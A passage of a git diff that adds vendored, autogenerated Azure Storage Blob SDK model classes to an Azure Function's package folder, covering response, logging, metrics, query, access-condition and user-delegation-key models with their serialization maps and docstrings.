'EnumerationResults' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword service_endpoint: Required. + :paramtype service_endpoint: str + :keyword container_name: Required. 
+ :paramtype container_name: str + :keyword prefix: + :paramtype prefix: str + :keyword marker: + :paramtype marker: str + :keyword max_results: + :paramtype max_results: int + :keyword delimiter: + :paramtype delimiter: str + :keyword segment: Required. + :paramtype segment: ~azure.storage.blob.models.BlobHierarchyListSegment + :keyword next_marker: + :paramtype next_marker: str + """ + super(ListBlobsHierarchySegmentResponse, self).__init__(**kwargs) + self.service_endpoint = kwargs['service_endpoint'] + self.container_name = kwargs['container_name'] + self.prefix = kwargs.get('prefix', None) + self.marker = kwargs.get('marker', None) + self.max_results = kwargs.get('max_results', None) + self.delimiter = kwargs.get('delimiter', None) + self.segment = kwargs['segment'] + self.next_marker = kwargs.get('next_marker', None) + + +class ListContainersSegmentResponse(msrest.serialization.Model): + """An enumeration of containers. + + All required parameters must be populated in order to send to Azure. + + :ivar service_endpoint: Required. + :vartype service_endpoint: str + :ivar prefix: + :vartype prefix: str + :ivar marker: + :vartype marker: str + :ivar max_results: + :vartype max_results: int + :ivar container_items: Required. + :vartype container_items: list[~azure.storage.blob.models.ContainerItem] + :ivar next_marker: + :vartype next_marker: str + """ + + _validation = { + 'service_endpoint': {'required': True}, + 'container_items': {'required': True}, + } + + _attribute_map = { + 'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'attr': True}}, + 'prefix': {'key': 'Prefix', 'type': 'str'}, + 'marker': {'key': 'Marker', 'type': 'str'}, + 'max_results': {'key': 'MaxResults', 'type': 'int'}, + 'container_items': {'key': 'ContainerItems', 'type': '[ContainerItem]', 'xml': {'name': 'Containers', 'wrapped': True, 'itemsName': 'Container'}}, + 'next_marker': {'key': 'NextMarker', 'type': 'str'}, + } + _xml_map = { + 'name': 'EnumerationResults' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword service_endpoint: Required. + :paramtype service_endpoint: str + :keyword prefix: + :paramtype prefix: str + :keyword marker: + :paramtype marker: str + :keyword max_results: + :paramtype max_results: int + :keyword container_items: Required. + :paramtype container_items: list[~azure.storage.blob.models.ContainerItem] + :keyword next_marker: + :paramtype next_marker: str + """ + super(ListContainersSegmentResponse, self).__init__(**kwargs) + self.service_endpoint = kwargs['service_endpoint'] + self.prefix = kwargs.get('prefix', None) + self.marker = kwargs.get('marker', None) + self.max_results = kwargs.get('max_results', None) + self.container_items = kwargs['container_items'] + self.next_marker = kwargs.get('next_marker', None) + + +class Logging(msrest.serialization.Model): + """Azure Analytics Logging settings. + + All required parameters must be populated in order to send to Azure. + + :ivar version: Required. The version of Storage Analytics to configure. + :vartype version: str + :ivar delete: Required. Indicates whether all delete requests should be logged. + :vartype delete: bool + :ivar read: Required. Indicates whether all read requests should be logged. + :vartype read: bool + :ivar write: Required. Indicates whether all write requests should be logged. + :vartype write: bool + :ivar retention_policy: Required. the retention policy which determines how long the associated + data should persist. 
+ :vartype retention_policy: ~azure.storage.blob.models.RetentionPolicy + """ + + _validation = { + 'version': {'required': True}, + 'delete': {'required': True}, + 'read': {'required': True}, + 'write': {'required': True}, + 'retention_policy': {'required': True}, + } + + _attribute_map = { + 'version': {'key': 'Version', 'type': 'str'}, + 'delete': {'key': 'Delete', 'type': 'bool'}, + 'read': {'key': 'Read', 'type': 'bool'}, + 'write': {'key': 'Write', 'type': 'bool'}, + 'retention_policy': {'key': 'RetentionPolicy', 'type': 'RetentionPolicy'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword version: Required. The version of Storage Analytics to configure. + :paramtype version: str + :keyword delete: Required. Indicates whether all delete requests should be logged. + :paramtype delete: bool + :keyword read: Required. Indicates whether all read requests should be logged. + :paramtype read: bool + :keyword write: Required. Indicates whether all write requests should be logged. + :paramtype write: bool + :keyword retention_policy: Required. the retention policy which determines how long the + associated data should persist. + :paramtype retention_policy: ~azure.storage.blob.models.RetentionPolicy + """ + super(Logging, self).__init__(**kwargs) + self.version = kwargs['version'] + self.delete = kwargs['delete'] + self.read = kwargs['read'] + self.write = kwargs['write'] + self.retention_policy = kwargs['retention_policy'] + + +class Metrics(msrest.serialization.Model): + """a summary of request statistics grouped by API in hour or minute aggregates for blobs. + + All required parameters must be populated in order to send to Azure. + + :ivar version: The version of Storage Analytics to configure. + :vartype version: str + :ivar enabled: Required. Indicates whether metrics are enabled for the Blob service. + :vartype enabled: bool + :ivar include_apis: Indicates whether metrics should generate summary statistics for called API + operations. + :vartype include_apis: bool + :ivar retention_policy: the retention policy which determines how long the associated data + should persist. + :vartype retention_policy: ~azure.storage.blob.models.RetentionPolicy + """ + + _validation = { + 'enabled': {'required': True}, + } + + _attribute_map = { + 'version': {'key': 'Version', 'type': 'str'}, + 'enabled': {'key': 'Enabled', 'type': 'bool'}, + 'include_apis': {'key': 'IncludeAPIs', 'type': 'bool'}, + 'retention_policy': {'key': 'RetentionPolicy', 'type': 'RetentionPolicy'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword version: The version of Storage Analytics to configure. + :paramtype version: str + :keyword enabled: Required. Indicates whether metrics are enabled for the Blob service. + :paramtype enabled: bool + :keyword include_apis: Indicates whether metrics should generate summary statistics for called + API operations. + :paramtype include_apis: bool + :keyword retention_policy: the retention policy which determines how long the associated data + should persist. + :paramtype retention_policy: ~azure.storage.blob.models.RetentionPolicy + """ + super(Metrics, self).__init__(**kwargs) + self.version = kwargs.get('version', None) + self.enabled = kwargs['enabled'] + self.include_apis = kwargs.get('include_apis', None) + self.retention_policy = kwargs.get('retention_policy', None) + + +class ModifiedAccessConditions(msrest.serialization.Model): + """Parameter group. 
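+
+    Example (an illustrative sketch, not part of the generated code; the ETag
+    value is assumed). It builds a condition so that an operation succeeds only
+    if the blob has not changed since the ETag was read::
+
+        conditions = ModifiedAccessConditions(if_match='"0x8DCA1B2C3D4E5F6"')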
+ + :ivar if_modified_since: Specify this header value to operate only on a blob if it has been + modified since the specified date/time. + :vartype if_modified_since: ~datetime.datetime + :ivar if_unmodified_since: Specify this header value to operate only on a blob if it has not + been modified since the specified date/time. + :vartype if_unmodified_since: ~datetime.datetime + :ivar if_match: Specify an ETag value to operate only on blobs with a matching value. + :vartype if_match: str + :ivar if_none_match: Specify an ETag value to operate only on blobs without a matching value. + :vartype if_none_match: str + :ivar if_tags: Specify a SQL where clause on blob tags to operate only on blobs with a matching + value. + :vartype if_tags: str + """ + + _attribute_map = { + 'if_modified_since': {'key': 'ifModifiedSince', 'type': 'rfc-1123'}, + 'if_unmodified_since': {'key': 'ifUnmodifiedSince', 'type': 'rfc-1123'}, + 'if_match': {'key': 'ifMatch', 'type': 'str'}, + 'if_none_match': {'key': 'ifNoneMatch', 'type': 'str'}, + 'if_tags': {'key': 'ifTags', 'type': 'str'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword if_modified_since: Specify this header value to operate only on a blob if it has been + modified since the specified date/time. + :paramtype if_modified_since: ~datetime.datetime + :keyword if_unmodified_since: Specify this header value to operate only on a blob if it has not + been modified since the specified date/time. + :paramtype if_unmodified_since: ~datetime.datetime + :keyword if_match: Specify an ETag value to operate only on blobs with a matching value. + :paramtype if_match: str + :keyword if_none_match: Specify an ETag value to operate only on blobs without a matching + value. + :paramtype if_none_match: str + :keyword if_tags: Specify a SQL where clause on blob tags to operate only on blobs with a + matching value. + :paramtype if_tags: str + """ + super(ModifiedAccessConditions, self).__init__(**kwargs) + self.if_modified_since = kwargs.get('if_modified_since', None) + self.if_unmodified_since = kwargs.get('if_unmodified_since', None) + self.if_match = kwargs.get('if_match', None) + self.if_none_match = kwargs.get('if_none_match', None) + self.if_tags = kwargs.get('if_tags', None) + + +class PageList(msrest.serialization.Model): + """the list of pages. + + :ivar page_range: + :vartype page_range: list[~azure.storage.blob.models.PageRange] + :ivar clear_range: + :vartype clear_range: list[~azure.storage.blob.models.ClearRange] + :ivar next_marker: + :vartype next_marker: str + """ + + _attribute_map = { + 'page_range': {'key': 'PageRange', 'type': '[PageRange]'}, + 'clear_range': {'key': 'ClearRange', 'type': '[ClearRange]'}, + 'next_marker': {'key': 'NextMarker', 'type': 'str'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword page_range: + :paramtype page_range: list[~azure.storage.blob.models.PageRange] + :keyword clear_range: + :paramtype clear_range: list[~azure.storage.blob.models.ClearRange] + :keyword next_marker: + :paramtype next_marker: str + """ + super(PageList, self).__init__(**kwargs) + self.page_range = kwargs.get('page_range', None) + self.clear_range = kwargs.get('clear_range', None) + self.next_marker = kwargs.get('next_marker', None) + + +class PageRange(msrest.serialization.Model): + """PageRange. + + All required parameters must be populated in order to send to Azure. + + :ivar start: Required. + :vartype start: long + :ivar end: Required. 
+ :vartype end: long + """ + + _validation = { + 'start': {'required': True}, + 'end': {'required': True}, + } + + _attribute_map = { + 'start': {'key': 'Start', 'type': 'long', 'xml': {'name': 'Start'}}, + 'end': {'key': 'End', 'type': 'long', 'xml': {'name': 'End'}}, + } + _xml_map = { + 'name': 'PageRange' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword start: Required. + :paramtype start: long + :keyword end: Required. + :paramtype end: long + """ + super(PageRange, self).__init__(**kwargs) + self.start = kwargs['start'] + self.end = kwargs['end'] + + +class QueryFormat(msrest.serialization.Model): + """QueryFormat. + + All required parameters must be populated in order to send to Azure. + + :ivar type: Required. The quick query format type. Possible values include: "delimited", + "json", "arrow", "parquet". + :vartype type: str or ~azure.storage.blob.models.QueryFormatType + :ivar delimited_text_configuration: Groups the settings used for interpreting the blob data if + the blob is delimited text formatted. + :vartype delimited_text_configuration: ~azure.storage.blob.models.DelimitedTextConfiguration + :ivar json_text_configuration: json text configuration. + :vartype json_text_configuration: ~azure.storage.blob.models.JsonTextConfiguration + :ivar arrow_configuration: Groups the settings used for formatting the response if the response + should be Arrow formatted. + :vartype arrow_configuration: ~azure.storage.blob.models.ArrowConfiguration + :ivar parquet_text_configuration: Any object. + :vartype parquet_text_configuration: any + """ + + _validation = { + 'type': {'required': True}, + } + + _attribute_map = { + 'type': {'key': 'Type', 'type': 'str', 'xml': {'name': 'Type'}}, + 'delimited_text_configuration': {'key': 'DelimitedTextConfiguration', 'type': 'DelimitedTextConfiguration'}, + 'json_text_configuration': {'key': 'JsonTextConfiguration', 'type': 'JsonTextConfiguration'}, + 'arrow_configuration': {'key': 'ArrowConfiguration', 'type': 'ArrowConfiguration'}, + 'parquet_text_configuration': {'key': 'ParquetTextConfiguration', 'type': 'object'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword type: Required. The quick query format type. Possible values include: "delimited", + "json", "arrow", "parquet". + :paramtype type: str or ~azure.storage.blob.models.QueryFormatType + :keyword delimited_text_configuration: Groups the settings used for interpreting the blob data + if the blob is delimited text formatted. + :paramtype delimited_text_configuration: ~azure.storage.blob.models.DelimitedTextConfiguration + :keyword json_text_configuration: json text configuration. + :paramtype json_text_configuration: ~azure.storage.blob.models.JsonTextConfiguration + :keyword arrow_configuration: Groups the settings used for formatting the response if the + response should be Arrow formatted. + :paramtype arrow_configuration: ~azure.storage.blob.models.ArrowConfiguration + :keyword parquet_text_configuration: Any object. + :paramtype parquet_text_configuration: any + """ + super(QueryFormat, self).__init__(**kwargs) + self.type = kwargs['type'] + self.delimited_text_configuration = kwargs.get('delimited_text_configuration', None) + self.json_text_configuration = kwargs.get('json_text_configuration', None) + self.arrow_configuration = kwargs.get('arrow_configuration', None) + self.parquet_text_configuration = kwargs.get('parquet_text_configuration', None) + + +class QueryRequest(msrest.serialization.Model): + """Groups the set of query request settings. 
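+
+    Example (an illustrative sketch, not part of the generated code; the SQL text
+    and CSV settings are assumed). It assembles a quick-query request over
+    comma-delimited blob data with a header row::
+
+        request = QueryRequest(
+            expression="SELECT * FROM BlobStorage",
+            input_serialization=QuerySerialization(
+                format=QueryFormat(
+                    type="delimited",
+                    delimited_text_configuration=DelimitedTextConfiguration(
+                        column_separator=",",
+                        headers_present=True,
+                    ),
+                )
+            ),
+        )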
+ + Variables are only populated by the server, and will be ignored when sending a request. + + All required parameters must be populated in order to send to Azure. + + :ivar query_type: Required. The type of the provided query expression. Has constant value: + "SQL". + :vartype query_type: str + :ivar expression: Required. The query expression in SQL. The maximum size of the query + expression is 256KiB. + :vartype expression: str + :ivar input_serialization: + :vartype input_serialization: ~azure.storage.blob.models.QuerySerialization + :ivar output_serialization: + :vartype output_serialization: ~azure.storage.blob.models.QuerySerialization + """ + + _validation = { + 'query_type': {'required': True, 'constant': True}, + 'expression': {'required': True}, + } + + _attribute_map = { + 'query_type': {'key': 'QueryType', 'type': 'str', 'xml': {'name': 'QueryType'}}, + 'expression': {'key': 'Expression', 'type': 'str', 'xml': {'name': 'Expression'}}, + 'input_serialization': {'key': 'InputSerialization', 'type': 'QuerySerialization'}, + 'output_serialization': {'key': 'OutputSerialization', 'type': 'QuerySerialization'}, + } + _xml_map = { + 'name': 'QueryRequest' + } + + query_type = "SQL" + + def __init__( + self, + **kwargs + ): + """ + :keyword expression: Required. The query expression in SQL. The maximum size of the query + expression is 256KiB. + :paramtype expression: str + :keyword input_serialization: + :paramtype input_serialization: ~azure.storage.blob.models.QuerySerialization + :keyword output_serialization: + :paramtype output_serialization: ~azure.storage.blob.models.QuerySerialization + """ + super(QueryRequest, self).__init__(**kwargs) + self.expression = kwargs['expression'] + self.input_serialization = kwargs.get('input_serialization', None) + self.output_serialization = kwargs.get('output_serialization', None) + + +class QuerySerialization(msrest.serialization.Model): + """QuerySerialization. + + All required parameters must be populated in order to send to Azure. + + :ivar format: Required. + :vartype format: ~azure.storage.blob.models.QueryFormat + """ + + _validation = { + 'format': {'required': True}, + } + + _attribute_map = { + 'format': {'key': 'Format', 'type': 'QueryFormat'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword format: Required. + :paramtype format: ~azure.storage.blob.models.QueryFormat + """ + super(QuerySerialization, self).__init__(**kwargs) + self.format = kwargs['format'] + + +class RetentionPolicy(msrest.serialization.Model): + """the retention policy which determines how long the associated data should persist. + + All required parameters must be populated in order to send to Azure. + + :ivar enabled: Required. Indicates whether a retention policy is enabled for the storage + service. + :vartype enabled: bool + :ivar days: Indicates the number of days that metrics or logging or soft-deleted data should be + retained. All data older than this value will be deleted. + :vartype days: int + :ivar allow_permanent_delete: Indicates whether permanent delete is allowed on this storage + account. + :vartype allow_permanent_delete: bool + """ + + _validation = { + 'enabled': {'required': True}, + 'days': {'minimum': 1}, + } + + _attribute_map = { + 'enabled': {'key': 'Enabled', 'type': 'bool'}, + 'days': {'key': 'Days', 'type': 'int'}, + 'allow_permanent_delete': {'key': 'AllowPermanentDelete', 'type': 'bool'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword enabled: Required. 
Indicates whether a retention policy is enabled for the storage
+         service.
+        :paramtype enabled: bool
+        :keyword days: Indicates the number of days that metrics or logging or soft-deleted data should
+         be retained. All data older than this value will be deleted.
+        :paramtype days: int
+        :keyword allow_permanent_delete: Indicates whether permanent delete is allowed on this storage
+         account.
+        :paramtype allow_permanent_delete: bool
+        """
+        super(RetentionPolicy, self).__init__(**kwargs)
+        self.enabled = kwargs['enabled']
+        self.days = kwargs.get('days', None)
+        self.allow_permanent_delete = kwargs.get('allow_permanent_delete', None)
+
+
+class SequenceNumberAccessConditions(msrest.serialization.Model):
+    """Parameter group.
+
+    :ivar if_sequence_number_less_than_or_equal_to: Specify this header value to operate only on a
+     blob if it has a sequence number less than or equal to the specified value.
+    :vartype if_sequence_number_less_than_or_equal_to: long
+    :ivar if_sequence_number_less_than: Specify this header value to operate only on a blob if it
+     has a sequence number less than the specified value.
+    :vartype if_sequence_number_less_than: long
+    :ivar if_sequence_number_equal_to: Specify this header value to operate only on a blob if it
+     has the specified sequence number.
+    :vartype if_sequence_number_equal_to: long
+    """
+
+    _attribute_map = {
+        'if_sequence_number_less_than_or_equal_to': {'key': 'ifSequenceNumberLessThanOrEqualTo', 'type': 'long'},
+        'if_sequence_number_less_than': {'key': 'ifSequenceNumberLessThan', 'type': 'long'},
+        'if_sequence_number_equal_to': {'key': 'ifSequenceNumberEqualTo', 'type': 'long'},
+    }
+
+    def __init__(
+        self,
+        **kwargs
+    ):
+        """
+        :keyword if_sequence_number_less_than_or_equal_to: Specify this header value to operate only on
+         a blob if it has a sequence number less than or equal to the specified value.
+        :paramtype if_sequence_number_less_than_or_equal_to: long
+        :keyword if_sequence_number_less_than: Specify this header value to operate only on a blob if
+         it has a sequence number less than the specified value.
+        :paramtype if_sequence_number_less_than: long
+        :keyword if_sequence_number_equal_to: Specify this header value to operate only on a blob if it
+         has the specified sequence number.
+        :paramtype if_sequence_number_equal_to: long
+        """
+        super(SequenceNumberAccessConditions, self).__init__(**kwargs)
+        self.if_sequence_number_less_than_or_equal_to = kwargs.get('if_sequence_number_less_than_or_equal_to', None)
+        self.if_sequence_number_less_than = kwargs.get('if_sequence_number_less_than', None)
+        self.if_sequence_number_equal_to = kwargs.get('if_sequence_number_equal_to', None)
+
+
+class SignedIdentifier(msrest.serialization.Model):
+    """Signed identifier.
+
+    All required parameters must be populated in order to send to Azure.
+
+    :ivar id: Required. A unique id.
+    :vartype id: str
+    :ivar access_policy: An Access policy.
+    :vartype access_policy: ~azure.storage.blob.models.AccessPolicy
+    """
+
+    _validation = {
+        'id': {'required': True},
+    }
+
+    _attribute_map = {
+        'id': {'key': 'Id', 'type': 'str'},
+        'access_policy': {'key': 'AccessPolicy', 'type': 'AccessPolicy'},
+    }
+    _xml_map = {
+        'name': 'SignedIdentifier'
+    }
+
+    def __init__(
+        self,
+        **kwargs
+    ):
+        """
+        :keyword id: Required. A unique id.
+        :paramtype id: str
+        :keyword access_policy: An Access policy.
+ :paramtype access_policy: ~azure.storage.blob.models.AccessPolicy + """ + super(SignedIdentifier, self).__init__(**kwargs) + self.id = kwargs['id'] + self.access_policy = kwargs.get('access_policy', None) + + +class SourceModifiedAccessConditions(msrest.serialization.Model): + """Parameter group. + + :ivar source_if_modified_since: Specify this header value to operate only on a blob if it has + been modified since the specified date/time. + :vartype source_if_modified_since: ~datetime.datetime + :ivar source_if_unmodified_since: Specify this header value to operate only on a blob if it has + not been modified since the specified date/time. + :vartype source_if_unmodified_since: ~datetime.datetime + :ivar source_if_match: Specify an ETag value to operate only on blobs with a matching value. + :vartype source_if_match: str + :ivar source_if_none_match: Specify an ETag value to operate only on blobs without a matching + value. + :vartype source_if_none_match: str + :ivar source_if_tags: Specify a SQL where clause on blob tags to operate only on blobs with a + matching value. + :vartype source_if_tags: str + """ + + _attribute_map = { + 'source_if_modified_since': {'key': 'sourceIfModifiedSince', 'type': 'rfc-1123'}, + 'source_if_unmodified_since': {'key': 'sourceIfUnmodifiedSince', 'type': 'rfc-1123'}, + 'source_if_match': {'key': 'sourceIfMatch', 'type': 'str'}, + 'source_if_none_match': {'key': 'sourceIfNoneMatch', 'type': 'str'}, + 'source_if_tags': {'key': 'sourceIfTags', 'type': 'str'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword source_if_modified_since: Specify this header value to operate only on a blob if it + has been modified since the specified date/time. + :paramtype source_if_modified_since: ~datetime.datetime + :keyword source_if_unmodified_since: Specify this header value to operate only on a blob if it + has not been modified since the specified date/time. + :paramtype source_if_unmodified_since: ~datetime.datetime + :keyword source_if_match: Specify an ETag value to operate only on blobs with a matching value. + :paramtype source_if_match: str + :keyword source_if_none_match: Specify an ETag value to operate only on blobs without a + matching value. + :paramtype source_if_none_match: str + :keyword source_if_tags: Specify a SQL where clause on blob tags to operate only on blobs with + a matching value. + :paramtype source_if_tags: str + """ + super(SourceModifiedAccessConditions, self).__init__(**kwargs) + self.source_if_modified_since = kwargs.get('source_if_modified_since', None) + self.source_if_unmodified_since = kwargs.get('source_if_unmodified_since', None) + self.source_if_match = kwargs.get('source_if_match', None) + self.source_if_none_match = kwargs.get('source_if_none_match', None) + self.source_if_tags = kwargs.get('source_if_tags', None) + + +class StaticWebsite(msrest.serialization.Model): + """The properties that enable an account to host a static website. + + All required parameters must be populated in order to send to Azure. + + :ivar enabled: Required. Indicates whether this account is hosting a static website. + :vartype enabled: bool + :ivar index_document: The default name of the index page under each directory. + :vartype index_document: str + :ivar error_document404_path: The absolute path of the custom 404 page. + :vartype error_document404_path: str + :ivar default_index_document_path: Absolute path of the default index page. 
+ :vartype default_index_document_path: str + """ + + _validation = { + 'enabled': {'required': True}, + } + + _attribute_map = { + 'enabled': {'key': 'Enabled', 'type': 'bool'}, + 'index_document': {'key': 'IndexDocument', 'type': 'str'}, + 'error_document404_path': {'key': 'ErrorDocument404Path', 'type': 'str'}, + 'default_index_document_path': {'key': 'DefaultIndexDocumentPath', 'type': 'str'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword enabled: Required. Indicates whether this account is hosting a static website. + :paramtype enabled: bool + :keyword index_document: The default name of the index page under each directory. + :paramtype index_document: str + :keyword error_document404_path: The absolute path of the custom 404 page. + :paramtype error_document404_path: str + :keyword default_index_document_path: Absolute path of the default index page. + :paramtype default_index_document_path: str + """ + super(StaticWebsite, self).__init__(**kwargs) + self.enabled = kwargs['enabled'] + self.index_document = kwargs.get('index_document', None) + self.error_document404_path = kwargs.get('error_document404_path', None) + self.default_index_document_path = kwargs.get('default_index_document_path', None) + + +class StorageError(msrest.serialization.Model): + """StorageError. + + :ivar message: + :vartype message: str + """ + + _attribute_map = { + 'message': {'key': 'Message', 'type': 'str'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword message: + :paramtype message: str + """ + super(StorageError, self).__init__(**kwargs) + self.message = kwargs.get('message', None) + + +class StorageServiceProperties(msrest.serialization.Model): + """Storage Service Properties. + + :ivar logging: Azure Analytics Logging settings. + :vartype logging: ~azure.storage.blob.models.Logging + :ivar hour_metrics: a summary of request statistics grouped by API in hour or minute aggregates + for blobs. + :vartype hour_metrics: ~azure.storage.blob.models.Metrics + :ivar minute_metrics: a summary of request statistics grouped by API in hour or minute + aggregates for blobs. + :vartype minute_metrics: ~azure.storage.blob.models.Metrics + :ivar cors: The set of CORS rules. + :vartype cors: list[~azure.storage.blob.models.CorsRule] + :ivar default_service_version: The default version to use for requests to the Blob service if + an incoming request's version is not specified. Possible values include version 2008-10-27 and + all more recent versions. + :vartype default_service_version: str + :ivar delete_retention_policy: the retention policy which determines how long the associated + data should persist. + :vartype delete_retention_policy: ~azure.storage.blob.models.RetentionPolicy + :ivar static_website: The properties that enable an account to host a static website. + :vartype static_website: ~azure.storage.blob.models.StaticWebsite + """ + + _attribute_map = { + 'logging': {'key': 'Logging', 'type': 'Logging'}, + 'hour_metrics': {'key': 'HourMetrics', 'type': 'Metrics'}, + 'minute_metrics': {'key': 'MinuteMetrics', 'type': 'Metrics'}, + 'cors': {'key': 'Cors', 'type': '[CorsRule]', 'xml': {'wrapped': True}}, + 'default_service_version': {'key': 'DefaultServiceVersion', 'type': 'str'}, + 'delete_retention_policy': {'key': 'DeleteRetentionPolicy', 'type': 'RetentionPolicy'}, + 'static_website': {'key': 'StaticWebsite', 'type': 'StaticWebsite'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword logging: Azure Analytics Logging settings. 
+ :paramtype logging: ~azure.storage.blob.models.Logging + :keyword hour_metrics: a summary of request statistics grouped by API in hour or minute + aggregates for blobs. + :paramtype hour_metrics: ~azure.storage.blob.models.Metrics + :keyword minute_metrics: a summary of request statistics grouped by API in hour or minute + aggregates for blobs. + :paramtype minute_metrics: ~azure.storage.blob.models.Metrics + :keyword cors: The set of CORS rules. + :paramtype cors: list[~azure.storage.blob.models.CorsRule] + :keyword default_service_version: The default version to use for requests to the Blob service + if an incoming request's version is not specified. Possible values include version 2008-10-27 + and all more recent versions. + :paramtype default_service_version: str + :keyword delete_retention_policy: the retention policy which determines how long the associated + data should persist. + :paramtype delete_retention_policy: ~azure.storage.blob.models.RetentionPolicy + :keyword static_website: The properties that enable an account to host a static website. + :paramtype static_website: ~azure.storage.blob.models.StaticWebsite + """ + super(StorageServiceProperties, self).__init__(**kwargs) + self.logging = kwargs.get('logging', None) + self.hour_metrics = kwargs.get('hour_metrics', None) + self.minute_metrics = kwargs.get('minute_metrics', None) + self.cors = kwargs.get('cors', None) + self.default_service_version = kwargs.get('default_service_version', None) + self.delete_retention_policy = kwargs.get('delete_retention_policy', None) + self.static_website = kwargs.get('static_website', None) + + +class StorageServiceStats(msrest.serialization.Model): + """Stats for the storage service. + + :ivar geo_replication: Geo-Replication information for the Secondary Storage Service. + :vartype geo_replication: ~azure.storage.blob.models.GeoReplication + """ + + _attribute_map = { + 'geo_replication': {'key': 'GeoReplication', 'type': 'GeoReplication'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword geo_replication: Geo-Replication information for the Secondary Storage Service. + :paramtype geo_replication: ~azure.storage.blob.models.GeoReplication + """ + super(StorageServiceStats, self).__init__(**kwargs) + self.geo_replication = kwargs.get('geo_replication', None) + + +class UserDelegationKey(msrest.serialization.Model): + """A user delegation key. + + All required parameters must be populated in order to send to Azure. + + :ivar signed_oid: Required. The Azure Active Directory object ID in GUID format. + :vartype signed_oid: str + :ivar signed_tid: Required. The Azure Active Directory tenant ID in GUID format. + :vartype signed_tid: str + :ivar signed_start: Required. The date-time the key is active. + :vartype signed_start: ~datetime.datetime + :ivar signed_expiry: Required. The date-time the key expires. + :vartype signed_expiry: ~datetime.datetime + :ivar signed_service: Required. Abbreviation of the Azure Storage service that accepts the key. + :vartype signed_service: str + :ivar signed_version: Required. The service version that created the key. + :vartype signed_version: str + :ivar value: Required. The key as a base64 string. 
+ :vartype value: str + """ + + _validation = { + 'signed_oid': {'required': True}, + 'signed_tid': {'required': True}, + 'signed_start': {'required': True}, + 'signed_expiry': {'required': True}, + 'signed_service': {'required': True}, + 'signed_version': {'required': True}, + 'value': {'required': True}, + } + + _attribute_map = { + 'signed_oid': {'key': 'SignedOid', 'type': 'str'}, + 'signed_tid': {'key': 'SignedTid', 'type': 'str'}, + 'signed_start': {'key': 'SignedStart', 'type': 'iso-8601'}, + 'signed_expiry': {'key': 'SignedExpiry', 'type': 'iso-8601'}, + 'signed_service': {'key': 'SignedService', 'type': 'str'}, + 'signed_version': {'key': 'SignedVersion', 'type': 'str'}, + 'value': {'key': 'Value', 'type': 'str'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword signed_oid: Required. The Azure Active Directory object ID in GUID format. + :paramtype signed_oid: str + :keyword signed_tid: Required. The Azure Active Directory tenant ID in GUID format. + :paramtype signed_tid: str + :keyword signed_start: Required. The date-time the key is active. + :paramtype signed_start: ~datetime.datetime + :keyword signed_expiry: Required. The date-time the key expires. + :paramtype signed_expiry: ~datetime.datetime + :keyword signed_service: Required. Abbreviation of the Azure Storage service that accepts the + key. + :paramtype signed_service: str + :keyword signed_version: Required. The service version that created the key. + :paramtype signed_version: str + :keyword value: Required. The key as a base64 string. + :paramtype value: str + """ + super(UserDelegationKey, self).__init__(**kwargs) + self.signed_oid = kwargs['signed_oid'] + self.signed_tid = kwargs['signed_tid'] + self.signed_start = kwargs['signed_start'] + self.signed_expiry = kwargs['signed_expiry'] + self.signed_service = kwargs['signed_service'] + self.signed_version = kwargs['signed_version'] + self.value = kwargs['value'] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/_models_py3.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/_models_py3.py new file mode 100644 index 0000000..b66512c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/_models_py3.py @@ -0,0 +1,2871 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +import datetime +from typing import Any, Dict, List, Optional, Union + +from azure.core.exceptions import HttpResponseError +import msrest.serialization + +from ._azure_blob_storage_enums import * + + +class AccessPolicy(msrest.serialization.Model): + """An Access policy. + + :ivar start: the date-time the policy is active. + :vartype start: str + :ivar expiry: the date-time the policy expires. + :vartype expiry: str + :ivar permission: the permissions for the acl policy. 
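+ Permissions are expressed as a string of single-letter flags (a value such as "rw",
+ for example, would grant read and write).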
+ :vartype permission: str + """ + + _attribute_map = { + 'start': {'key': 'Start', 'type': 'str'}, + 'expiry': {'key': 'Expiry', 'type': 'str'}, + 'permission': {'key': 'Permission', 'type': 'str'}, + } + + def __init__( + self, + *, + start: Optional[str] = None, + expiry: Optional[str] = None, + permission: Optional[str] = None, + **kwargs + ): + """ + :keyword start: the date-time the policy is active. + :paramtype start: str + :keyword expiry: the date-time the policy expires. + :paramtype expiry: str + :keyword permission: the permissions for the acl policy. + :paramtype permission: str + """ + super(AccessPolicy, self).__init__(**kwargs) + self.start = start + self.expiry = expiry + self.permission = permission + + +class AppendPositionAccessConditions(msrest.serialization.Model): + """Parameter group. + + :ivar max_size: Optional conditional header. The max length in bytes permitted for the append + blob. If the Append Block operation would cause the blob to exceed that limit or if the blob + size is already greater than the value specified in this header, the request will fail with + MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed). + :vartype max_size: long + :ivar append_position: Optional conditional header, used only for the Append Block operation. A + number indicating the byte offset to compare. Append Block will succeed only if the append + position is equal to this number. If it is not, the request will fail with the + AppendPositionConditionNotMet error (HTTP status code 412 - Precondition Failed). + :vartype append_position: long + """ + + _attribute_map = { + 'max_size': {'key': 'maxSize', 'type': 'long'}, + 'append_position': {'key': 'appendPosition', 'type': 'long'}, + } + + def __init__( + self, + *, + max_size: Optional[int] = None, + append_position: 